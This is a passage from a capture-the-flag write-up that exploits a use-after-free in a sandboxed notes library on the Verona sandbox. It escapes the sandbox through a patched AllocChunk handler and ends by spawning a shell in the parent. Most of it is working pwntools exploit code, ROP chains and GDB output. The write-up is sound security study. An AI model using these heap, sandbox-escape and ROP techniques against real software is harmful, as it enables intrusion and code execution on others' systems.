  notes[idx]->printfn = print_note;
  printf("Enter note content: ");
  if (read(0, notes[idx]->contents, size) < 0) { return false; }
  return true;
}

static bool free_note() {
  unsigned int idx = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  if (notes[idx] == NULL) { return false; }
  else {
    free(notes[idx]->contents);
    free(notes[idx]);
  }
  return true;
}

static bool edit_note() {
  unsigned int idx = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  if (notes[idx] == NULL) { return false; }
  else {
    printf("Enter note content: ");
    if (read(0, notes[idx]->contents, notes[idx]->size) < 0) { return false; }
    return true;
  }
}

static bool view_note() {
  unsigned int idx = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  if (notes[idx] == NULL) { return false; }
  else {
    notes[idx]->printfn(notes[idx]);
    return true;
  }
}

void init_stuff() {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  setvbuf(stderr, NULL, _IONBF, 0);
}

extern "C" void sandbox_init()
{
  init_stuff();
  sandbox::ExportedLibrary::export_function(::new_note);
  sandbox::ExportedLibrary::export_function(::edit_note);
  sandbox::ExportedLibrary::export_function(::free_note);
  sandbox::ExportedLibrary::export_function(::view_note);
}

At this point, we can guess that our attack strategy will look like this: exploit the UAF to gain RCE in the child, use the RCE to exploit the vulnerable patches and escape the sandbox, attack the parent and gain RCE (to read the flag). The write-up will be subsequently divided into these 3 sections.

It is useful to think about this challenge in terms of the security model. Given that the sandbox’s threat model already assumes the attacker has RCE within the sandbox, we cannot break the sandbox’s security model unless we find a 0-day in the library or the patch introduces new exploitable vulnerabilities.

Child UAF to RCE

Typical heap exploits will not work out of the box since we are using a custom allocator, snmalloc. However, the general concepts still apply. I will discuss two exploits. The first exploit works on newer kernel versions (like my machine) but fails on older kernels (like the one used on remote).

This first exploit abuses the snmalloc free list behaviour. Let’s first set up GDB so that we can analyze the allocations. This is tricky since the sandbox environment is highly sensitive. Triggering a break in the execution of either the parent or child with CTRL + C in GDB will cause a premature termination of the program. From pwntools, I used the following GDB script to break in the malloc() calls used in new_note().

handle SIGSYS nostop
set follow-fork-mode child

b *(main+0x29f)
commands 1
# CALL malloc note
b *(new_note+0xb0)
# CALL malloc contents
b *(new_note+0xfd)
end

c

The first command stops GDB from breaking on the SIGSYS signal. Because of the sandbox architecture, many syscalls are hooked and have stricter replacements. Regular usage of these syscalls (originating from the linker/libc) may result in SIGSYS. Breaking on these signals increases the amount of noise and we aren’t interested in them anyway.

The second command configures GDB to debug the child process instead of the parent. By default, GDB will remain attached to the parent chall, which we do not want.

The next breakpoint is right before the child enters its main run loop. Recall that the child is the library_runner binary. This breakpoint corresponds to this point in the source (see comment):

[...]
  // Set up the sandbox
  sandbox_init();
  sandbox_invoke =
    reinterpret_cast<decltype(sandbox_invoke)>(dlfunc(handle, "sandbox_call"));
  SANDBOX_INVARIANT(
    sandbox_invoke, "Sandbox invoke invoke function not found {}", dlerror());

  shared->token.is_child_executing = false;
  shared->token.is_child_loaded = true;

  static constexpr size_t stack_size = 8 * 1024 * 1024;
  void* stack = malloc(stack_size);
  // Enter the run loop, waiting for calls from trusted code.
  // We do this in a new thread so that our stack can be in the shared region.
  // This avoids the need to copy arguments from the stack to the heap.
  // [!] Breakpoint here!
  runloop_with_stack_pivot(stack, stack_size);

  return 0;
}

At this stage of the child bootstrapping, it would have already set up the environment but not entered the run loop where it awaits calls from the parent. So, we can break at this point without interrupting the parent-child communication channel, which would otherwise cause the premature termination as mentioned above. The child would also have loaded the vulnerable library sandboxedlib.so before this point, so we can create breakpoints referencing its signals. The GDB script creates one breakpoint prior to each of these two malloc() calls in new_note():

[...]
  if ((notes[idx] = (struct note *)malloc(sizeof(struct note))) == NULL) {
    return false;
  }
  if ((notes[idx]->contents = (char *)malloc(size)) == NULL) {
    return false;
  }
[...]

When we create a note of size 0x50, there is a prior allocation of 0x18 for the note struct. We can see the backtrace for this malloc() call below.

──────────────────────────────────────────────────────── arguments (guessed) ────
malloc@plt (
   $rdi = 0x0000000000000018,
   $rsi = 0x000000000000000a,
   $rdx = 0x0000000000000000,
   $rcx = 0x0000000000000010
   )
──────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "library_runner", stopped 0x7ffff79f69ac in new_note() (), reason: BREAKPOINT
────────────────────────────────────────────────────────────────────── trace ────
[#0]0x7ffff79f69ac _ new_note()()
[#1] 0x7ffff79f8fda _ bool std::__invoke_impl<bool, bool (*&)()>(std::__invoke_other, bool (*&)())()
[#2] 0x7ffff79f8f4b _ std::__invoke_result<bool (*&)()>::type std::__invoke<bool (*&)()>(bool (*&)())()
[#3] 0x7ffff79f8d5b _ decltype(auto) std::__apply_impl<bool (*&)(), std::tuple<>&>(bool (*&)(), std::tuple<>&, std::integer_sequence<unsigned long>)()
[#4] 0x7ffff79f8d98 _ decltype(auto) std::apply<bool (*&)(), std::tuple<>&>(bool (*&)(), std::tuple<>&)()
[#5] 0x7ffff79f8e04 _ sandbox::ExportedFunction<bool>::operator()(void*)()
[#6] 0x7ffff79f708d _ sandbox::ExportedLibrary::call(int, void*)()
[#7] 0x7ffff79f66bd _ sandbox_call()
[#8] 0x555555583e19 _ (anonymous namespace)::runloop(int)()
[#9] 0x5555555850cc _ runloop_with_stack_pivot()

GDB backtrace

The first note struct is allocated at 0x7fff80010a40, with its contents (of size 0x50) allocated at 0x7fff800140a0. After the allocation but before the program writes to the allocated memory, this is what the note struct chunk looks like in the shared heap:

gef_  x/12gx 0x7fff80010a40  # this is allocated for the `note` struct
0x7fff80010a40: 0x00007fff80010a60      0x0000000000000000
0x7fff80010a50: 0x0000000000000000      0x0000000000000000
0x7fff80010a60: 0x00007fff80010a80      0x0000000000000000
0x7fff80010a70: 0x0000000000000000      0x0000000000000000
0x7fff80010a80: 0x00007fff80010aa0      0x0000000000000000
0x7fff80010a90: 0x0000000000000000      0x0000000000000000

snmalloc maintains a freelist of all its free chunks. The first QWORD of each free chunk contains a pointer to the next free chunk. A free chunk of size 0x20 is used to service the malloc(0x18) request earlier. Hence, the chunks in the freelist are all 0x20 apart in memory. Although 0x7fff80010a40 has just been allocated, the program has not written to the chunk yet so the freelist pointer remains intact. We will use this to get a heap leak later.

gef_  vmmap 0x7fff80010a40
[ Legend:  Code | Heap | Stack ]
Start              End                Offset             Perm Path
0x00007fff80000000 0x00007fffc0000000 0x0000000000000000 rw- /memfd:Verona Sandbox (deleted)

The heap allocations belong to the sandboxed heap. This segment is mapped at the same address in both the parent and the child.

To better illustrate the freelist mechanism, let’s create 2 notes each of size 0x50 then free them. We’ll create the first note with content "AAAAAAAA" and the second with "BBBBBBBB". From the GDB breakpoints, we find that the allocations are:

note 1 (sz 0x18):     0x7fff80010a40
contents 1 (sz 0x50): 0x7fff800140a0

note 2 (sz 0x18):     0x7fff80010a60
contents 2 (sz 0x50): 0x7fff800140f0

As expected, we find that the note struct allocations are 0x20 apart, while the note buffers are 0x50 apart. Now, let’s delete the first note. This frees both the struct and its buffer. This is the buffer after being freed:

gef_  x/10gx 0x7fff800140a0
0x7fff800140a0: 0x4141414141414141      0x0000000000000000
0x7fff800140b0: 0x0000000000000000      0x0000000000000000
0x7fff800140c0: 0x0000000000000000      0x0000000000000000
0x7fff800140d0: 0x0000000000000000      0x0000000000000000
0x7fff800140e0: 0x0000000000000000      0x0000000000000000

Its contents "AAAAAAAA" are untouched by the allocator. Let’s delete the second note and check again:

gef_  x/10gx 0x7fff800140a0
0x7fff800140a0: 0x00007fff800140f0      0x0000000000000000
0x7fff800140b0: 0x0000000000000000      0x0000000000000000
0x7fff800140c0: 0x0000000000000000      0x0000000000000000
0x7fff800140d0: 0x0000000000000000      0x0000000000000000
0x7fff800140e0: 0x0000000000000000      0x0000000000000000

We see that the first QWORD has now been updated to point to the second freed chunk, creating a new freelist. Recall that we have a UAF on freed notes in which we can edit and view them. Notice also that the freelist pointer overlaps with the size property of the note struct:

struct note {
  size_t size;
  void (*printfn)(struct note *);
  char *contents;
};

This means that we can abuse the freelist mechanism together with the UAF to trick the program into thinking that the note has an extremely large size. This gives us a OOB read and write on the shared heap chunk. We have established that snmalloc services allocations based on the freelist. Given that this primitive allows us to read and write almost anything in the shared heap, we can easily overwrite the freelist and force snmalloc to allocate us arbitrary chunks. We can force the allocation of a buffer over an existing note struct, allowing us to overwrite its properties. Overwriting the contents pointer will give us arbitrary read/write, while overwriting printfn will give us an arbitrary function call.

static bool view_note() {
  unsigned int idx = 0;
  bool ok = get_idx(&idx);
  if (!ok) { return false; }
  if (notes[idx] == NULL) { return false; }
  else {
    notes[idx]->printfn(notes[idx]);
    return true;
  }
}

'note::printfn()' is used in 'view_note()' to print the contents of the note.

This Python script overlaps note[3]->contents with note[2]:

sz = 0x50
new_note(0, sz, b"B")  # 0x7fff80010a40, 0x7fff800140a0
leak = view_note(0)
heap_leak = u64(leak[:8]) // 0x100 * 0x100
log.info(f"shared heap leak: {hex(heap_leak)}")  # 0x7fff80014000

new_note(1, sz, b"C")  # 0x7fff80010a60, 0x7fff800140f0

delete_note(0)
delete_note(1)
# note[0]->sz = 0x7fff80010a60

# Use heap-fu on the heap leak to calculate addresses
target = heap_leak - (0x7fff800140a0 // 0x100 * 0x100) + 0x7fff80010a80
# Overwrite the freelist pointer with target
payload = b"A"*0x50 + b"B"*0x50 + p64(target)  # 0x00007fff80014190
edit_note(0, payload)

new_note(2, sz, b"D")  # 0x7fff80010a80, 0x7fff80014140
# Trigger the allocation to target
new_note(3, sz, b"\x50")  # 0x7fff80010aa0, <target>
# note[3]->contents = note[2]

Viewing note[3] will print the contents of the note[2] struct, including the printfn function pointer. This gives us a leak to the base address of the shared library.

child = ELF("/app/build/sandboxedlib.so", checksec=False)
leak = view_note(3)
elf_leak = u64(leak[8:][:8])

child_offset_print_note = 0x00000000000a8c3
child.address = elf_leak - child_offset_print_note
log.info(f"child base: {hex(child.address)}")
assert child.address % 0x1000 == 0

We define two helper functions arb_read() and arb_write(), using the former to get a libc leak by reading the shared library’s GOT.

def arb_read(target: int, sz: int) -> bytes:
    log.info(f"Doing arb read on {hex(target)}, {hex(sz)} bytes.")
    payload = p64(sz) + p64(child.address + child_offset_print_note) + p64(target)
    edit_note(3, payload)
    return view_note(2)

def arb_write(target: int, sz: int, contents: bytes):
    log.info(f"Doing arb write on {hex(target)}, {hex(sz)} bytes.")
    payload = p64(sz) + p64(child.address + child_offset_print_note) + p64(target)
    edit_note(3, payload)
    edit_note(2, contents)

# setvbuf GOT
libc_leak = u64(arb_read(child.address + 0x13020, 0x8).strip())
child_libc = ELF("./libc.so.6", checksec=False)
child_libc.address = libc_leak - child_libc.sym["setvbuf"]
log.info(f"child libc: {hex(child_libc.address)}")

With our primitives, we can go on to leak the child’s base address as well as the stack address (from __environ). However, neither will be useful for our exploit. The library_runner actually performs a stack pivot before entering its main loop. While we can craft a ROP on the original stack, the child would only return to the original stack after exiting the main loop and ceases communication with its parent. This prevents us from performing a sandbox escape.

Instead, it is more useful to leak the address of the pivoted stack and perform ROP there. Luckily, the pivoted stack actually resides in the same memory segment as our heap leak so we can already calculate its address. The exact address can be found by setting appropriate breakpoints. Since our arbitrary write primitive already uses the edit_note() function, I thought to use the arbitrary write to overwrite the return address of the edit_note() function with a ROP chain, gaining RCE.

edit_note_ret_addr = heap_leak - 0x7fff80014000 + 0x00007fff807ffe08
payload = p64(0xdeadbeef)
arb_write(edit_note_ret_addr, len(payload) + 8, payload, False)

This triggers a SIGSEGV with rip = 0xdeadbeef. Nice!

Another important thing to note is that the sandbox is extremely sensitive to interruptions. When the parent calls the sandbox function edit_note(), it will keep polling the child until it receives a response. If the child does not send a response within a certain amount of time, the parent will terminate the sandbox. The readme’s Calling sandbox functions section explains this behaviour in greater depth. Empirically, if we perform a normal ROP chain that exits without responding to the parent, the error "Sandboxed library terminated abnormally" will be thrown as the parent detects that the child has exited unexpectedly.

Let’s look at the callstack:

gef_  tele $rsp-0x8 -l 32
0x00007fff807ffe08│+0x0000: 0x00000000deadbeef   _ $rsi
0x00007fff807ffe10│+0x0008: 0x0000000000000000   _ $rsp
0x00007fff807ffe18│+0x0010: 0x00007fff8000c0d8  _  0x00007ffff79f6b5e  _  <edit_note()+0000> endbr64
0x00007fff807ffe20│+0x0018: 0x00007fff807ffe40  _  0x00007fff807ffe60  _  0x00007fff807ffe90  _  0x00007fff807ffec0  _  0x00007fff807ffee0  _  0x00007fff807fff00  _  0x00007fff807fffe0      _ $rbp
0x00007fff807ffe28│+0x0020: 0x00007ffff79f8f4b  _  <std::__invoke_result<bool (*&)()>::type std::__invoke<bool (*&)()>(bool (*&)())+0024> leave
0x00007fff807ffe30│+0x0028: 0x0000000100000001
0x00007fff807ffe38│+0x0030: 0x00007fff8000c0d8  _  0x00007ffff79f6b5e  _  <edit_note()+0000> endbr64
0x00007fff807ffe40│+0x0038: 0x00007fff807ffe60  _  0x00007fff807ffe90  _  0x00007fff807ffec0  _  0x00007fff807ffee0  _  0x00007fff807fff00  _  0x00007fff807fffe0  _  0x00007fffffffece0
0x00007fff807ffe48│+0x0040: 0x00007ffff79f8d5b  _  <decltype(auto) std::__apply_impl<bool (*&)(), std::tuple<>&>(bool (*&)(), std::tuple<>&, std::integer_sequence<unsigned long>)+0028> leave
0x00007fff807ffe50│+0x0048: 0x00007fff80004111  _  0x0000007fff800041 ("A"?)
0x00007fff807ffe58│+0x0050: 0x00007fff8000c0d8  _  0x00007ffff79f6b5e  _  <edit_note()+0000> endbr64
0x00007fff807ffe60│+0x0058: 0x00007fff807ffe90  _  0x00007fff807ffec0  _  0x00007fff807ffee0  _  0x00007fff807fff00  _  0x00007fff807fffe0  _  0x00007fffffffece0  _  0x0000000000000001
0x00007fff807ffe68│+0x0060: 0x00007ffff79f8d98  _  <decltype(auto) std::apply<bool (*&)(), std::tuple<>&>(bool (*&)(), std::tuple<>&)+003b> mov rbx, QWORD PTR [rbp-0x8]
0x00007fff807ffe70│+0x0068: 0x00007fff80004111  _  0x0000007fff800041 ("A"?)
0x00007fff807ffe78│+0x0070: 0x00007fff8000c0d8  _  0x00007ffff79f6b5e  _  <edit_note()+0000> endbr64
0x00007fff807ffe80│+0x0078: 0x00007fff807ffea0  _  0x00007fff80004110  _  0x00007fff80004100  _  0x00007fff80004101  _  0x0000007fff800041 ("A"?)
0x00007fff807ffe88│+0x0080: 0x00007fffffffeba8  _  0x000055555558539c  _  <main+02a4> mov eax, 0x0
0x00007fff807ffe90│+0x0088: 0x00007fff807ffec0  _  0x00007fff807ffee0  _  0x00007fff807fff00  _  0x00007fff807fffe0  _  0x00007fffffffece0  _  0x0000000000000001
0x00007fff807ffe98│+0x0090: 0x00007ffff79f8e04  _  <sandbox::ExportedFunction<bool>::operator()(void*)+0066> mov rdx, QWORD PTR [rbp-0x8]
0x00007fff807ffea0│+0x0098: 0x00007fff80004110  _  0x00007fff80004100  _  0x00007fff80004101  _  0x0000007fff800041 ("A"?)
0x00007fff807ffeb0│+0x00a8: 0x0000000000000002
0x00007fff807ffeb8│+0x00b0: 0x00007fff80004110  _  0x00007fff80004100  _  0x00007fff80004101  _  0x0000007fff800041 ("A"?)
0x00007fff807ffec0│+0x00b8: 0x00007fff807ffee0  _  0x00007fff807fff00  _  0x00007fff807fffe0  _  0x00007fffffffece0  _  0x0000000000000001
0x00007fff807ffec8│+0x00c0: 0x00007ffff79f708d  _  <sandbox::ExportedLibrary::call(int, void*)+0044> nop
0x00007fff807ffed0│+0x00c8: 0x00007fff80004110  _  0x00007fff80004100  _  0x00007fff80004101  _  0x0000007fff800041 ("A"?)
0x00007fff807ffed8│+0x00d0: 0x0000000255588a7e
0x00007fff807ffee0│+0x00d8: 0x00007fff807fff00  _  0x00007fff807fffe0  _  0x00007fffffffece0  _  0x0000000000000001
0x00007fff807ffee8│+0x00e0: 0x00007ffff79f66bd  _  <sandbox_call+0024> nop
0x00007fff807ffef0│+0x00e8: 0x00007fff80004110  _  0x00007fff80004100  _  0x00007fff80004101  _  0x0000007fff800041 ("A"?)
0x00007fff807ffef8│+0x00f0: 0x0000000280000208
0x00007fff807fff00│+0x00f8: 0x00007fff807fffe0  _  0x00007fffffffece0  _  0x0000000000000001
0x00007fff807fff08│+0x0100: 0x0000555555583e19  _  <(anonymous namespace)::runloop(int)+015b> mov rax, QWORD PTR [rip+0x35338]       

Note that the offsets are relative to '$rsp-0x8' in order to include the current '$rip' in the display.

The important pointer is at offset +0x100, of $rsp+0xf8. This resumes execution in the child’s runloop() function. We can find its source in library_runner.cc as usual:

[...]
      try
      {
        if ((buf != nullptr) && (sandbox_invoke != nullptr))
          sandbox_invoke(idx, buf);
      }
      catch (...)
      {
        // FIXME: Report error in some useful way.
        SANDBOX_INVARIANT(0, "Uncaught exception");
      }
      new_depth = shared->token.callback_depth;
      // Wake up the parent if it's expecting a wakeup for this callback depth.
      // The `callback` function has a wake but not a wait because it is using
      // the `wait` in this function, we need to ensure that we don't unbalance
      // the wakes and waits.
      if (new_depth == callback_depth)
      {
        shared->token.is_child_executing = false;
        shared->token.parent.wake();
      }
    } while (new_depth == callback_depth);
  }

After a successful invocation of the call, the function updates the call stack depth and wakes the parent, completing the call interaction. We can avoid the parent throwing an error by ensuring that we complete execution of this function, properly closing the interaction loop. Since it is at a large offset from $rsp, we will have plenty of space to craft a ROP chain before returning. We should also load the saved RBP so that the program can continue execution.

edit_note_ret_addr = heap_leak - 0x7fff80014000 + 0x00007fff807ffe08
rop = ROP([child_libc])
# TODO: craft a ROP chain
payload = rop.chain()
RET = 0x00133beb + child_libc.address
POP_RBP_RET = 0x001bc00f + child_libc.address

# preserve call stack so that we can respond to the parent (otherwise we get "Sandboxed library terminated abnormally")
# RET sled
payload += (((0xf8 - len(payload)) // 0x8) - 1) * p64(RET)
# load the saved RBP and ret to runloop
payload += p64(POP_RBP_RET)
arb_write(edit_note_ret_addr, len(payload) + 8, payload, False)

Now, we can execute an arbitrary ROP chain in the child without causing either the parent or child to error out. We will discuss the ROP chain in the next section.

As mentioned at the start, this exploit only works on newer kernel versions. I had finished writing an exploit that worked locally when I realized that the behaviour seemed to differ with remote. This is because this attack relies on the read and write syscalls supporting extremely large sizes. The freelist pointer overlaps with size, causing note[i]->size to be very large. This size is then used in the read and write syscalls. On my machine running a 6.8.x kernel, this succeeds. Unfortunately, the remote is running a older kernel which implements the syscalls differently, causing the calls to EFAULT.

Luckily, the alternative (intended) exploit path is arguably easier. As with most memory allocators, snmalloc eventually re-allocates freed chunks to the user. Empirically, snmalloc does not use a LIFO system for free chunks. Instead, we need to exhaust its initial free memory (recall the linked list we saw in the first allocation) before it allocates from user-freed chunks. From testing, this means that we first need to allocate around 256 chunks before snmalloc uses our freed chunk. The exact number varies from local to remote but we can simply continue creating new notes until we detect an overlap.

new_note(0, 24, b"B")
leak = view_note(0)
heap_leak = u64(leak[:8]) // 0x100 * 0x100
log.info(f"shared heap leak: {hex(heap_leak)}")  # 0x7fff80014000
delete_note(0)

new_note(1, 48, b"C")
delete_note(1)

# we now have 3 free sz 24 chunks
context.log_level = "info"
for i in range(0x400):
    new_note(2, 24, b"D")
    leak = view_note(2).strip()
    if leak[8] == 0xc3: # printfn LSB
        break
else:
    assert False  # gg

# note[2]->contents == note[0]

We create an 0x18 sized note and a larger note. Since the note struct is itself 0x18 bytes large, deleting both notes will free three size 0x18 chunks. Then, we exhaust the existing free list by creating new notes in a loop. The vulnerable library’s new_note() does not check whether a note already exists so we can simply create new notes in place without freeing them. Within the loop, we check whether our allocation has overlapped with one of the freed note structs. We can detect this by viewing the note. If it overlaps, we will find the printfn function pointer at offset 8.

This results in note[2]->contents overlapping with note[0]. This is a similar situation to the first attack method, which overlapped note[3]->contents with note[2]. From this point, we can employ the same techniques to obtain our arbitrary read and arbitrary write primitives, so the rest of the exploit remains the same.

Sandbox escape

To recap, we now have arbitrary code execution with the sandboxed library. Our next goal is to escape the sandbox and pwn the parent. As mentioned earlier, the sandbox’s threat model already assumes the attacker to have RCE within the sandboxed library and yet remains secure. Thus, the only way to break the security model and escape the sandbox is to exploit the new patches.

As discussed above, the patch to the AllocChunk handler clearly violates the sandbox’s security model. The patch allows the child to set arbitrary metaentries in the pagemap. These are actually the exact metaentries that the Library object ends up cleaning up in its destructor!

  case AllocChunk:
  {
	auto size = static_cast<size_t>(rpc.args[0]);
	if (
	  (size < snmalloc::MIN_CHUNK_SIZE) ||
	  !snmalloc::bits::is_pow2(size))
	{
	  reply.error = 3;
	  break;
	}
	auto meta =
	  reinterpret_cast<SharedAllocConfig::Backend::SlabMetadata*>(
		rpc.args[1]);
	auto ras = rpc.args[2];
	SharedAllocConfig::Pagemap::Entry metaentry{meta, ras};
//	if (!is_metaentry_valid(size, metaentry)) // [!] removed in patch
//	{
//	  reply.error = 1;
//	  break;
//	}
	snmalloc::capptr::Arena<void> alloc;
	{
	  auto [g, m] = s->get_memory();
	  alloc = m.alloc_range(size);
	}
	if (alloc == nullptr)
	{
	  reply.error = 2;
	  break;
	}
//	metaentry.claim_for_sandbox(); // [!] removed in patch
	SharedAllocConfig::Pagemap::set_metaentry(
	  address_cast(alloc), size, metaentry);

	reply.ret = alloc.unsafe_uintptr();
	break;
  }

The patched 'AllocChunk' handler does not validate the attacker-supplied metaentry before registering it with 'set_metaentry()'.

Library::~Library()
  {
[...]
      for (snmalloc::address_t a = base; a < top; a += snmalloc::MIN_CHUNK_SIZE)
      {
        auto& meta = SharedAllocConfig::Pagemap::get_metaentry_mut(a);
        if (!meta.is_backend_owned())
        {
          auto* remote = meta.get_remote();
		  if ((remote != nullptr) &&
			!contains(remote, sizeof(snmalloc::RemoteAllocator)))
          {
            delete meta.get_slab_metadata();
          }
        }
        meta = empty;
      }
[...]
  }

The patched destructor will call 'delete' on any attacker-supplied metaentry.

By making an AllocChunk request from the child with a specific meta (the second parameter passed to the RPC call), the destructor will later delete that exact pointer. This gives us an arbitrary delete in the parent. This completely breaks the security model of the sandbox.

The vulnerable library helpfully contains two convenience functions that enable the child to easily send AllocChunk and DeallocChunk requests to the RPC thread in the parent. These functions remain unused in the library but we can call them from our ROP chain.

HostServiceResponse sendRequest(HostServiceRequest req)
{
  auto written_bytes = write(PageMapUpdates, &req, sizeof(req));
  HostServiceResponse response;
  auto read_bytes = read(PageMapUpdates, &response, sizeof(response));
  UNUSED(written_bytes);
  UNUSED(read_bytes);
  return response;
}

uintptr_t try_dealloc(const void* addr, size_t size)
{
  HostServiceRequest req{
    DeallocChunk,
    {reinterpret_cast<uintptr_t>(addr), static_cast<uintptr_t>(size), 0, 0}};
  return sendRequest(req).error;
}

HostServiceResponse try_alloc(size_t size, uintptr_t meta, uintptr_t ras)
{
  return sendRequest({AllocChunk, {size, meta, ras}});
}

These exact function names are also used in one of the Verona sandbox’s tests, sandboxlib-rpc-bounds.cc. This test was introduced after the developers patched multiple vulnerabilities in the RPC thread (this thread contains the AllocChunk and DeallocChunk handlers discussed earlier). This is a hint that we will likely be exploiting the newly vulnerable handlers.

This payload achieves an arbitrary delete on the specified delete_target.

delete_target = 0xd00fd00f

edit_note_ret_addr = heap_leak - 0x7fff80010a00 + 0x00007fff807ffe08
rop = ROP([child_libc])
child_offset_try_alloc = 0xa7c1
rop.call(child.address + child_offset_try_alloc, [0x4000, delete_target, 0x4054])
payload = rop.chain()
RET = 0x00133beb + child_libc.address
POP_RBP_RET = 0x001bc00f + child_libc.address

# preserve call stack so that we can respond to the parent (otherwise we get "Sandboxed library terminated abnormally")
payload += (((0xf8 - len(payload)) // 0x8) - 1) * p64(RET) + p64(POP_RBP_RET)
arb_write(edit_note_ret_addr, len(payload) + 8, payload, False)

# Exit the child, triggering the destructor.
leave()

The other parameters to the RPC call also need to satisfy certain checks, but these are relatively simple to pass.

We can place a breakpoint in the parent as it calls the Library destructor.

_ZdlPvmSt11align_val_t@plt (
   $rdi = 0x00000000d00fd010,
   $rsi = 0x0000000000000040,
   $rdx = 0x0000000000000040
)
──────────────────────────────────────────────── threads ────
[#0] Id 1, Name: "chall", stopped 0x7ffff7f5dec3 in sandbox::Library::~Library() (), reason: BREAKPOINT
[#1] Id 2, Name: "chall", stopped 0x7ffff7b5be2e in epoll_wait (), reason: BREAKPOINT
────────────────────────────────────────────────── trace ────
[#0] 0x7ffff7f5dec3 _ sandbox::Library::~Library()()
[#1] 0x403ca6 _ ChallSandbox::~ChallSandbox()()
[#2] 0x4037e4 _ sandboxed_session()()
[#3] 0x403833 _ main()

The 'delete' symbol is mangled but we can spot that our specified 'delete_target' is indeed being freed!

Parent RCE

After compromising the sandbox’s security model, the last step of the exploit is to achieve RCE in the parent. This is straightforward with our arbitrary delete primitive. By specifying a shared heap address as the delete target, we can force the parent to add a shared heap chunk into its free chunk bins (note that the parent uses the standard glibc memory allocator, not snmalloc). Further writes to this shared heap chunk from the child will then affect the parent’s behaviour.

While we have to destroy our sandbox instance in order to trigger the arbitrary delete, the parent allows us to spin up a new child. The new child will have the shared heap mapped at the same address. We can use the arbitrary read/write primitives to manipulate the heap chunk in the parent.

The feedback struct is an attractive target for this attack.

struct feedback {
  char *ptr;
  size_t size;
  char content[460];
};

struct feedback *the_feedback = NULL;

bool get_feedback() {
  if (the_feedback == NULL) {
    if ((the_feedback = (struct feedback *)malloc(sizeof(struct feedback))) == NULL) {
      printf("Out of memory.\n");
      return false;
    }
    the_feedback->ptr = (char *)&the_feedback->content;
    the_feedback->size = sizeof(the_feedback->content);
  }
  printf("Thank you for using this app!\n");
  printf("Please provide your feedback: ");
  read(0, the_feedback->ptr, the_feedback->size);
  return true;
}

bool view_feedback() {
  if (the_feedback == NULL) {
    printf("No feedback.\n");
    return false;
  }
  printf("Your feedback: ");
  write(1, the_feedback->ptr, the_feedback->size);
  return true;
}

We can force the parent to delete a shared heap chunk that is the same size as the feedback struct. Then, when the parent allocates the struct with malloc(sizeof(struct feedback)) in get_feedback(), it will use the forged shared heap chunk as the feedback struct. From the child, we can use our primitives to overwrite the ptr member in order to gain arbitrary read/write in the parent.

# Forge a glibc heap chunk in the shared heap. This chunk must pass the typical delete checks.
target_area = heap_leak + 0x1000000 * 4
payload = p64(0) + p64(0x21) + b"A"*0x10
payload += p64(0) + p64(0x1e0 + 0x10 + 0x1) + b"A" * 0x50
payload += p64(0) + p64(0x21) #+ b"A" * 0x10
arb_write(target_area, len(payload) + 8, payload)
delete_target = target_area + 0x20 + 0x10

edit_note_ret_addr = heap_leak - 0x7fff80010a00 + 0x00007fff807ffe08
rop = ROP([child_libc])
child_offset_try_alloc = 0xa7c1
rop.call(child.address + child_offset_try_alloc, [0x4000, delete_target, 0x4054])
payload = rop.chain()
RET = 0x00133beb + child_libc.address
POP_RBP_RET = 0x001bc00f + child_libc.address

# preserve call stack so that we can respond to the parent (otherwise we get "Sandboxed library terminated abnormally")
payload += (((0xf8 - len(payload)) // 0x8) - 1) * p64(RET) + p64(POP_RBP_RET)
arb_write(edit_note_ret_addr, len(payload) + 8, payload, False)

leave()

# Restart
sla(b"Start a new ", b"1")

# Allocate the forge chunk from shared memory for parent's `struct Feedback`
get_feedback(b"Test")

[...] # Do the same thing to set up the r/w primitives in the child again

def parent_read(target: int, sz: int) -> bytes:
    arb_write(delete_target, 0x10, p64(target) + p64(sz))
    return view_feedback()

def parent_write(target: int, sz: int, contents: bytes):
    arb_write(delete_target, 0x10, p64(target) + p64(sz))
    return get_feedback(contents)

With read and write primitives in the parent, we can easily leak the stack and craft a ROP chain to ret2win.

parent = ELF("/app/build/chall", checksec=False)
parent_libc_leak = u64(parent_read(parent.got["setvbuf"], 0x8).strip())
parent_libc = ELF("./libc.so.6", checksec=False)
parent_libc.address = parent_libc_leak - parent_libc.sym["setvbuf"]
log.info(f"Parent libc: {hex(parent_libc.address)}")
assert parent_libc.address % 0x1000 == 0

parent_stack_leak = u64(parent_read(parent_libc.sym["environ"], 0x8).strip())
log.info(hex(parent_stack_leak))

main_ret_addr = parent_stack_leak - 0x7fffffffee18 + 0x00007fffffffecf8
rop = ROP([parent_libc])
binsh = next(parent_libc.search(b"/bin/sh\x00"))
rop.execve(binsh, 0, 0)
payload = rop.chain()
parent_write(main_ret_addr, len(payload)+8, payload)

leave()

# exit
sla(b"Start a new ", b"2")
p.interactive()

Flag: TISC{35c4p3_fr0m_pr150n_r34lm}

I have a huge fondness for Pwn in novel environments; the only other challenge I wrote a write-up for this year was a Solana validator client written in C! In solving this challenge, I really enjoyed reading the snmalloc paper and the Verona sandbox design doc too. Such research projects are always interesting to learn about and I’ll definitely be following Verona’s development as it continues to mature.

Revenge of the Dragon

The final level of TISC is a kernel pwn challenge. This is the most traditional challenge out of the past three levels and serves as a good introduction to kernel pwn. I won’t be covering the fundamentals of kernel pwn as there already exist many excellent resources teaching them, such as ptr-yudai’s Pawnyable and Midas’ kernel series.

As usual, we are provided with the kernel image bzImage and the root filesystem initramfs.cpio.gz. The author has provided a run/ folder containing the necessary files to boot the kernel locally and a serve/ folder containing the files used by the remote server. Helpfully, the vulnerable driver’s source is provided in src/server.c.

$ ls -l --recursive dist
dist:
total 276
-rw-r--r-- 1 root root 258390 Jul 21 21:49 Kconfig
-rw-r--r-- 1 root root    280 Jul 21 21:49 README.md
-rw-r--r-- 1 root root     69 Jul 21 21:49 docker-compose.yml
drwxr-xr-x 2 root root   4096 Sep  8 23:35 run
drwxr-xr-x 2 root root   4096 Sep  8 23:35 serve
drwxr-xr-x 2 root root   4096 Sep  8 23:35 src

dist/run:
total 9760
-rw-r--r-- 1 root root 8889472 Jul 21 21:49 bzImage
-rw-r--r-- 1 root root 1097121 Sep  8 23:07 initramfs.cpio.gz
-rw-r--r-- 1 root root     241 Jul 21 21:49 run.sh

dist/serve:
total 13284
